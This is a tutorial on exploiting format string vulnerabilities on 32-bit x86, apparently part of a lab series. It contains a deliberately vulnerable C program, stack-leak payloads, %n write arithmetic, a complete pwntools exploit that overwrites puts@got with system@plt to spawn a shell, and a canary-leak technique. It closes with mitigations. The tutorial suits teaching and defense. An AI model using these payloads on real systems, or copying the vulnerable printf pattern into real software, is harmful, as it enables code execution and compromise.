Format String Vulnerabilities on x86

A format string bug is a single missing "%s" away from arbitrary read and arbitrary write. When user input reaches printf (or fprintf, sprintf, snprintf, vprintf, syslog, …) as the format argument instead of as a data argument, the conversion specifiers in that input drive what printf does next: walk the stack, dereference pointers as strings, and write integers into memory of your choosing.

Note

Lab Setup This tutorial uses the vuln binary from the Linux Exploitation Lab (09-format-string-x86/). See the setup guide for build instructions and tool installation.

If building natively, install the required tools and disable ASLR for predictable addresses:
sudo apt install checksec gdb gcc-multilib
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Re-enable ASLR when you’re done: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Note

Examples below use pwntools. Install with pip install pwntools.

What Goes Wrong with `printf(user_input)`

printf is variadic. Its first argument is a format string; subsequent arguments are pulled from the stack (on x86) according to the conversion specifiers it finds. The function has no way to know how many arguments were actually passed: it trusts the format string completely.

Vulnerable:

// vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

__attribute__((used))
void force_system_plt(void) {
    system(":");                // keep system@plt in the lab binary
}

int main(int argc, char **argv) {
    char buf[128];

    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;

    printf(buf);                 // user input is the FORMAT string
    puts("");

    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    puts(buf);                   // second sink we'll hijack later

    return 0;
}

Safe (the same data, but treated as data):

printf("%s", buf);

Compile without PIE, with stack protector, and with FORTIFY explicitly disabled. Leave NX on (it does not stop us) and leave canaries on (the format string bug doesn’t smash the saved return pointer):

gcc -m32 -no-pie -fstack-protector-strong -U_FORTIFY_SOURCE \
    -z noexecstack -o vuln vuln.c

checksec --file=./vuln
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

Note

Why leave the canary on? A format string bug doesn’t need to overflow anything. We will turn it into an arbitrary 1- or 2-byte write into the GOT, which sits in .got.plt, nowhere near the stack. The canary is irrelevant. Section 6 even shows how a format string bug is the textbook way to defeat canaries on a stack overflow elsewhere in the same process.

Warning

Modern glibc gates %n With glibc’s fortified printf wrappers, especially _FORTIFY_SOURCE=2 and newer distro defaults, %n in a writable format string aborts with *** %n in writable segment detected ***. The lab vuln is compiled with -U_FORTIFY_SOURCE, so %n is allowed. Real targets in the wild often have fortify on; the technique still applies to fortify-disabled builds and to format strings stored in read-only segments.

Reading the Stack with `%x` and `%p`

When printf sees %x it pulls the next 4 bytes (on x86) from the argument area and prints them as hex. If you didn’t push an argument, it just keeps walking up the stack.

$ ./vuln
AAAA %x %x %x %x %x %x %x %x
AAAA 80 f7faf580 80485ed 41414141 78252078 20782520 25207825 78252078

Three things to notice:

The first few words are whatever happened to be in the argument slots before printf was called (libc internals, saved register values).
41414141 is our own AAAA — the buffer lives on the stack and we’re reading it back as an “argument”.
After our buffer, printf continues to read more of our format string itself as data (78252078 is " %x" in little endian).

Counting %xs gets old fast. Use positional access — the N$ modifier asks for the Nth argument directly:

$ ./vuln
AAAA %1$p %2$p %3$p %4$p %5$p %6$p %7$p %8$p
AAAA 0x80 0xf7faf580 0x80485ed 0x41414141 0x78243125 0x70243325 0x24352520 0x37252070

Our AAAA is at position 4. That number is the offset we’ll use for every subsequent read or write — remember it.

A cleaner way to find your offset, with a recognisable marker:

from pwn import *

r = process('./vuln')
r.sendline(b'BBBB ' + b' '.join(f'%{i}$p'.encode() for i in range(1, 12)))
print(r.recvline().decode())

BBBB 0x80 0xf7faf580 0x80485ed 0x42424242 0x70243525 ...
                              ^^^^^^^^^^
                              position 4

Note

The exact offset depends on stack layout: how the calling function set up its frame, what was pushed before printf, and whether the buffer is char buf[128] on the stack or a heap pointer. Always re-find the offset for your binary; do not copy literals from a write-up.

Leaking Strings with `%s`

%s does not pull a string off the stack. It pulls a pointer and dereferences it. Combined with positional access, that means: pick any stack slot that contains a pointer to a C string, and %N$s prints what it points to.

The cheap demo: have a known string somewhere on the stack and read it back.

// leak_demo.c
#include <stdio.h>
int main(void) {
    char *secret = "the password is hunter2";
    char buf[64];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);
    return 0;
}

$ ./leak_demo
%1$s %2$s %3$s %4$s %5$s %6$s %7$s
(garbage)... the password is hunter2 ...

Walk positions until you find one that points at a printable string. In a real target you would walk the stack with %p first, identify which slot holds a pointer into .rodata or the heap, then switch to %s for that exact slot.

Reading an arbitrary address is one trick further. Place the address you want to dereference into the format string itself (so it lives on the stack as part of buf) and then read it back as a string with the matching position number:

from pwn import *

target = 0x0804a020          # some address you want to read as a C string
payload = p32(target) + b'|%4$s'
# position 4 is where our buffer starts (we measured this earlier)

r = process('./vuln')
r.sendline(payload)
print(r.recvline())

printf parses the format. When it reaches %4$s, it reads slot 4 of the argument area — which is the first 4 bytes of buf, i.e. our target — and dereferences it as a char *.

Warning

%s segfaults on bad pointers If the slot you reference doesn’t contain a readable address, printf dereferences garbage and the process dies. Always verify with %p first that the slot holds a sensible pointer (or, when injecting your own pointer like above, that the address is actually mapped). A crash here also kills the connection in remote scenarios — you only get one shot.

Writing with `%n`, `%hn`, and `%hhn`

%n is the strange one. It writes the number of characters printed so far to the int * argument. It produces no output of its own.

int n;
printf("hello%n\n", &n);   // n == 5

The width specifiers (%10d, %50c, …) inflate the printed-byte count without needing matching data, and that count is what %n writes. Variants:

Specifier	Writes	Width
`%n`	`int`	4 bytes
`%hn`	`short`	2 bytes
`%hhn`	`char`	1 byte

To write the value 0xDEAD (decimal 57005) at address X:

[ 4 bytes: X ]%57005c%4$hn
              ^^^^^^^         pad output to 57005 characters
                      ^^^^^   write a 2-byte short to slot 4 (which is X)

printf happily prints 57005 spaces. That’s 57 KB to the screen, which is fine. To write a full 32-bit value (say 0xdeadbeef), do not use a single %n with a 3.7-billion-byte field — split into two %hn writes at X and X+2:

write low half  (0xbeef = 48879) at X
write high half (0xdead = 57005) at X+2

The trick is that printf only ever increases its character count. Order the writes so each width specifier is the additional bytes needed since the last write, not the absolute total. Smaller half first:

%48879c%4$hn          -> count = 48879, write 0xbeef at X
%8126c%5$hn           -> count = 57005, write 0xdead at X+2
                              (8126 = 57005 - 48879)

Each %hn consumes a positional slot; you need two pointers (X and X+2) staged on the stack, hence two slot numbers.

Note

Doing this math by hand is unpleasant and error-prone (off-by-ones in the slot numbers, the slot containing a pointer landing inside the padded field, etc.). pwntools has a helper that does exactly this, covered in the next section.

GOT Overwrite to Redirect Execution

Strategy: overwrite puts@got with the address of system@plt. After the write, the program’s second puts(buf) call dereferences the GOT, lands at system@plt instead, and system(buf) runs whatever is in buf. Pass /bin/sh as that second line of input and you have a shell.

We need three addresses, all of which are fixed because the binary is non-PIE:

$ objdump -R ./vuln | grep -E 'puts|system'
0804c014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c018 R_386_JUMP_SLOT   system@GLIBC_2.0

$ objdump -d -j .plt ./vuln | grep -A1 '<system@plt>'
08049090 <system@plt>:
 8049090:  ff 25 18 c0 04 08    jmp    *0x804c018

Each PLT stub jumps through its own GOT slot: puts@plt reads the pointer at 0x0804c014, system@plt reads the pointer at 0x0804c018. The exploit doesn’t touch system’s GOT entry; it overwrites the pointer at puts@got so that the next call through puts@plt lands on system@plt instead of libc’s puts.

puts_got    = 0x0804c014   # the GOT slot we will overwrite
system_plt  = 0x08049090   # the value we will write into it

(addresses are from this lab build; read your own binary — they vary by toolchain)

We want the 4 bytes at puts_got to become 0x08049090. Split:

low half  = 0x9090   at puts_got
high half = 0x0804   at puts_got + 2

What `fmtstr_payload` does

pwntools ships fmtstr_payload(offset, writes) where writes is a dict mapping target address to value. It:

Plans a sequence of %hhn or %hn writes whose cumulative byte counts are monotonically increasing.
Lays out the target addresses as a header at the start of the payload (so they sit at known positions on the stack).
Emits %Nc padders and %K$hn writers in the right order, where K is the slot number of each address pointer in the header.

Roughly, for our case it produces:

[puts_got] [puts_got+2] %<pad1>c %<offset>$hhn %<pad2>c %<offset+1>$hhn ...

You almost never want to write this by hand once you know what’s happening underneath. Use the helper.

Complete exploit

#!/usr/bin/env python3
# exploit.py
from pwn import *

context.binary = elf = ELF('./vuln')

puts_got   = elf.got['puts']
system_plt = elf.plt['system']

# Find the offset to our buffer first (one-shot probe).
# We measured offset = 4 for this binary in the earlier section.
offset = 4

payload = fmtstr_payload(offset, {puts_got: system_plt})
log.info('payload length: {}'.format(len(payload)))

r = process('./vuln')
r.sendline(payload)              # first fgets -> printf(buf) executes the writes
r.recvuntil(b'\n')               # consume printf output (and the puts(""))
r.sendline(b'/bin/sh')           # second fgets -> puts(buf) is now system(buf)
r.interactive()

$ python3 exploit.py
[*] payload length: 44
[+] Starting local process './vuln': pid 30421
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

The first line of input is consumed entirely by the format string parser inside printf; its output (mostly garbage and padding) goes to stdout but does no harm. Once printf returns, puts@got no longer points into libc — it points at system@plt. The second puts(buf) call is now system("/bin/sh").

The tiny force_system_plt() helper in the lab source exists only so the linker emits a system@plt stub. Real targets often do not import system; in that case you need a libc leak and you overwrite the GOT entry with the resolved libc address of system instead. See the Return-to-libc tutorial for that leak step.

Why one-byte writes scale better

A single %n with 0xdeadbeef would print ~3.7 billion characters before writing. %hn caps the printed-byte count between writes at 65535; %hhn caps it at 255. fmtstr_payload defaults to %hhn (4 writes for a 32-bit address) precisely so the printed output stays small even when target bytes are at opposite ends of the value range.

Defeating Stack Canaries by Leaking Them

If the same process has both a format string bug and a separate stack overflow, the format string is the canary’s lockpick. The canary is a per-thread value sitting on the stack between local buffers and the saved return address:

gdb-peda$ x/wx $ebp-0x4
0xbffff21c:  0x83b6dc00       <- the canary

%p reads it just like any other stack slot:

$ ./vuln
%17$p
0x83b6dc00

(slot number depends on the function’s local layout; walk %p to find the one that ends in 00 — glibc deliberately makes the low byte of every canary a null so naive strcpy chains can’t leak it).

Once you have the value, send a second payload that overflows the buffer but writes the leaked canary back into its original slot before continuing past it. Saved EBP and EIP after the canary are then yours as usual.

The full canary-bypass walkthrough is the next tutorial in this series; this section is just to underline that a format string bug undermines every stack-side mitigation in the same process.

Why x64 Is Harder

x86 passes all variadic arguments on the stack, so printf’s “next argument” pointer marches straight through the same memory your buffer lives in. Positional access at %4$p reads stack slot 4, full stop.

The System V AMD64 ABI passes the first six integer/pointer arguments in registers (rdi, rsi, rdx, rcx, r8, r9). For printf, rdi holds the format string itself; the remaining five register slots are whatever the compiler last loaded. printf reads those five register slots first as positions 1-5, then starts reading the stack at position 6.

Practical consequences:

%1$p through %5$p give you register garbage, not your buffer.
Your buffer (if it’s on the stack) typically begins around %6$p, sometimes later if the function has many locals.
Padding offsets in fmtstr_payload shift accordingly. pwntools handles this if you set context.arch = 'amd64', but the offset you measure will be 6+ rather than 4.
Address writes are 8 bytes wide, so fmtstr_payload plans 8 %hhn writes per target instead of 4. Printed-byte counts are still bounded by the 0-255 range per write.

A toy x64 walk:

context.arch = 'amd64'
r.sendline(b'AAAAAAAA ' + b' '.join(f'%{i}$p'.encode() for i in range(1, 12)))
# AAAAAAAA  0x... 0x... 0x... 0x... 0x... 0x4141414141414141 ...
#                                          ^ position 6

Everything else carries over: same %n family, same GOT-overwrite plan, same pwntools helper. Just expect higher offsets and longer payloads.

Key Concepts

Why this works

printf trusts the format string to describe its own arguments.
When the format string is user-controlled, every conversion specifier becomes a primitive: %x/%p for read, %s for indirect read, %n/%hn/%hhn for write.
Positional access (%N$) means we don’t need to consume the entire argument area to reach a specific slot.
The GOT is writable on Partial RELRO binaries — one well-aimed %hn redirects every subsequent call through it.

Mitigations that actually help

Full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only after relocation; a %n write into it faults instead of redirecting execution.
_FORTIFY_SOURCE rejects %n in writable format strings at runtime.
-Wformat -Wformat-security flags printf(buf) at compile time. Treat it as an error in CI.
Don’t pass user input as a format string. Always printf("%s", buf).

Troubleshooting

`* %n in writable segment detected *`

Your glibc has fortify enabled. Either rebuild the target without -D_FORTIFY_SOURCE, or move the format string into a read-only segment (which a real attacker rarely controls). The lab binary should be built with -U_FORTIFY_SOURCE -O0 to keep %n enabled.

Crash inside `printf`

Almost always a bad %s. Walk the stack with %p first and only dereference slots that look like valid pointers into mapped regions. If you injected your own pointer into the format string, double-check endianness and make sure the address itself doesn’t contain a null byte that truncated fgets.

Wrong offset

The offset is per-binary and per-call-site. A buffer on main’s stack and a buffer on a deeper function’s stack will sit at different positions. Re-measure when the call site changes; don’t reuse offsets between binaries.

`fmtstr_payload` produces a payload that includes null bytes

fmtstr_payload emits ASCII format-string syntax, but the target addresses it writes into the header are raw 32-bit/64-bit pointers and may contain 0x00. If the input is read with fgets/read this is fine; if it’s read with scanf("%s", ...) or gets, the null truncates the payload. Switch sinks or use fmtstr_payload(..., write_size='byte', numbwritten=0) and consider stashing the address pointers via an alternate route.

Binary is PIE

You cannot hardcode puts_got or system_plt. Leak a code or libc address first (the format string itself is a perfect leak primitive: dump enough %p slots to find a saved return into the binary, subtract the known offset to get the binary base, then compute puts_got and system_plt from there). Only after the leak can you build the GOT-overwrite payload.

What Goes Wrong with printf(user_input)

Reading the Stack with %x and %p

Leaking Strings with %s

Writing with %n, %hn, and %hhn

GOT Overwrite to Redirect Execution

What fmtstr_payload does

Complete exploit

Why one-byte writes scale better

Defeating Stack Canaries by Leaking Them

Why x64 Is Harder

Key Concepts

Why this works

Mitigations that actually help

Troubleshooting

*** %n in writable segment detected ***

Crash inside printf

Wrong offset

fmtstr_payload produces a payload that includes null bytes

Binary is PIE

What Goes Wrong with `printf(user_input)`

Reading the Stack with `%x` and `%p`

Leaking Strings with `%s`

Writing with `%n`, `%hn`, and `%hhn`

What `fmtstr_payload` does

`* %n in writable segment detected *`

Crash inside `printf`

`fmtstr_payload` produces a payload that includes null bytes